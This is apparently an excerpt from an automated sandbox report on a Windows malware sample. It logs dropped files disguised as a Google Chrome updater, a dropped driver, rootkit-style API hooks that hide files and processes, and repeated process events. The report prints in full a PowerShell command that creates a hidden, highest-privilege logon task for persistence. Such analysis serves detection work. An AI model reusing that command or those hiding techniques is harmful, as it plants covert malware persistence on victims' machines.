Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }	Jump to behavior

Source: h2qWqtD73F.exe	Static PE information: real checksum: 0x5c2518 should be: 0x5b7873
Source: piukhnngkvtj.tmp.0.dr	Static PE information: real checksum: 0x27db6 should be: 0x2d110
Source: updater.exe.0.dr	Static PE information: real checksum: 0x5c2518 should be: 0x5b7873

Source: h2qWqtD73F.exe	Static PE information: section name: .xdata
Source: updater.exe.0.dr	Static PE information: section name: .xdata
Source: piukhnngkvtj.tmp.0.dr	Static PE information: section name: .xdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFE7DD4D2A5 pushad ; iretd	6_2_00007FFE7DD4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFE7DE6754D push ebx; iretd	6_2_00007FFE7DE6756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFE7DE600BD pushad ; iretd	6_2_00007FFE7DE600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFE7DE67BD3 push eax; ret	6_2_00007FFE7DE67BA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFE7DE67B9A push eax; ret	6_2_00007FFE7DE67BA9
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6784FD push rcx; retf 003Fh	8_2_000002EA8A6784FE
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6722B8 push rdx; retf	8_2_000002EA8A6722B9
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6A94FD push rcx; retf 003Fh	8_2_000002EA8A6A94FE
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6F84FD push rcx; retf 003Fh	8_2_000002EA8A6F84FE
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6F22B8 push rdx; retf	8_2_000002EA8A6F22B9
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338C22B8 push rdx; retf	9_2_000001CB338C22B9
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338C84FD push rcx; retf 003Fh	9_2_000001CB338C84FE
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338F94FD push rcx; retf 003Fh	9_2_000001CB338F94FE
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027A22B8 push rdx; retf	10_2_0000026E027A22B9
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027A84FD push rcx; retf 003Fh	10_2_0000026E027A84FE
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027D94FD push rcx; retf 003Fh	10_2_0000026E027D94FE
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEEF84FD push rcx; retf 003Fh	11_2_000001C6CEEF84FE
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEEF22B8 push rdx; retf	11_2_000001C6CEEF22B9
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF294FD push rcx; retf 003Fh	11_2_000001C6CEF294FE
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF584FD push rcx; retf 003Fh	11_2_000001C6CEF584FE
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF522B8 push rdx; retf	11_2_000001C6CEF522B9
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304F984FD push rcx; retf 003Fh	12_2_0000025304F984FE
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304F922B8 push rdx; retf	12_2_0000025304F922B9
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211484FD push rcx; retf 003Fh	13_2_0000016C211484FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211422B8 push rdx; retf	13_2_0000016C211422B9
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211794FD push rcx; retf 003Fh	13_2_0000016C211794FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211D94FD push rcx; retf 003Fh	13_2_0000016C211D94FE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F47BE22B8 push rdx; retf	14_2_0000026F47BE22B9
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F47BE84FD push rcx; retf 003Fh	14_2_0000026F47BE84FE
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B91DE84FD push rcx; retf 003Fh	15_2_0000029B91DE84FE
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B91DE22B8 push rdx; retf	15_2_0000029B91DE22B9

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1060, type: MEMORYSTR

Source: C:\Users\user\Desktop\h2qWqtD73F.exe	File created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe			Jump to dropped file
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	File created: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmp			Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1060, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
